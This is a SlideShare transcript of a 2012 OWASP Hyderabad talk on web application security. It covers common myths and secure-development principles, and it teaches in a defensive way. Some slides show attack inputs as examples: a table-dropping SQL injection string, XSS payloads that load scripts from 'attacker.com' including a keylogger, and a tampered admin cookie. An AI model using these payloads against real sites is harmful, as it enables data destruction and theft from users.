Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

How to secure web applications

2,243 views

Published on

I presented this presentation at owasp hyderabad oct 2012 meet. you can find more details at https://www.owasp.org/index.php/Hyderabad

Published in: Technology

How to secure web applications

  1. 1. “The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards ” - Gene Spafford
  2. 2. A BIRDS EYE VIEW ofSECURING WEB APPLICATIONS
  3. 3. Hello Everyone
  4. 4. Imran Mohammed# Security Researcher# Null Hyd Moderator# OWASP Hyd Board Member@imran_naseem
  5. 5. Do you know ?
  6. 6. 90% of companies got hacked last yearhttp://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey
  7. 7. To name few ...
  8. 8. 60% got hacked twice
  9. 9. 50% are unsure about this year
  10. 10. Myths of App Sec
  11. 11. Myth #1We have network firewall & WAF
  12. 12. Myth #2We have SSL hence we are secure
  13. 13. Myth #3Testing team will handle security
  14. 14. Myth #4Nobody will attack us, we are a small organization
  15. 15. “If you think technology can solve your security problems, then you dont understand the problems and you dont understand the technology ” - Bruce Schneier
  16. 16. Ten commandments of secure development
  17. 17. Input is evil, validate itValidate input source, context, syntax and semantics of data, current and previous states
  18. 18. SQL InjectionFront-end: https://bookstore.com/index.php?authorname=JamesBack-end: SELECT title,year FROM books WHERE author = ‘James’
  19. 19. SQL InjectionFront-end: https://bookstore.com/index.php?authorname=James’; drop table books;––Back-end: SELECT title,year FROM books WHERE author = James’; drop table books;––
  20. 20. Cross Site ScriptingFunctionality: https://example.com/error.php?message=Sorry%2c+an +error+occurred“Reflected” back to the client via webserver:  <p>Sorry, an error occurred.</p>Any Problem ?https://example.com/error.php?message=[can i change this ?]
  21. 21. Cross Site ScriptingAttack Users: https://example.com/error.php?message=<script src=”attacker.com/malicious.js”></script>“Reflected” back to the client via webserver:  <p><script src=”attacker.com/malicious.js”></script>.</p>More problemshttps://example.com/error.php?message=<script src=”attacker.com/keylogger.js”></script>https://example.com/error.php?message=<script>document.location.href=”badsite.com”</script>
  22. 22. Check thisPOST /books/user1/search.asp HTTP/1.1Accept: image/gif, image/xxbitmap, image/jpeg, image/pjpeg, application/xshockwaveflash, application/vnd.msexcel,Accept-Language: en-gb,en-us;Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) isCookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d he ck th CHost: www.example.com th isq=sqli C heckhidden_field=20 is he ck th C
  23. 23. Use cryptographically strong algorithms
  24. 24. Base 64 is not encryptionCookie: lang=english; sessionid=aW1yYW4=Cookie: lang=english; sessionid=cmFnaHU=
  25. 25. MD5 is not good enoughhttp://www.example.com/salary/view/8635f8ebae3017a5581dbeba 572eb01a Google it
  26. 26. Use SHA2 or better with salt
  27. 27. Minimize attack surface
  28. 28. Use Least privilege
  29. 29. Keep security simpleKeep design as simple and small as possible. Complex design isdifficult to understand and secure.
  30. 30. Provide Defense in depth
  31. 31. Fail safelyisAdmin = true;try { codeWhichMayFail(); isAdmin = isUserInRole( “Administrator” );}catch (Exception ex) { log.write(ex.toString());}
  32. 32. Avoid Security through obscurity
  33. 33. Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABCCookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC
  34. 34. Fix Security issues correctly
  35. 35. Use Secure defaultsRemember scott/tiger ? andAdmin/password ( routers admin panel )
  36. 36. Dont reinvent the wheeel
  37. 37. How to do develop/fix the code securely ?
  38. 38. Follow Secure SDLC
  39. 39. OWASP Development Guide
  40. 40. Educate Developers/Users
  41. 41. Use OWASP ESAPI
  42. 42. Typical OWASP ESAPI Example
  43. 43. Thanks !
  44. 44. Questions ?
  45. 45. CreditsAll icons are taken from the noun projectOWASP Project related Images are taken from owasp.org

×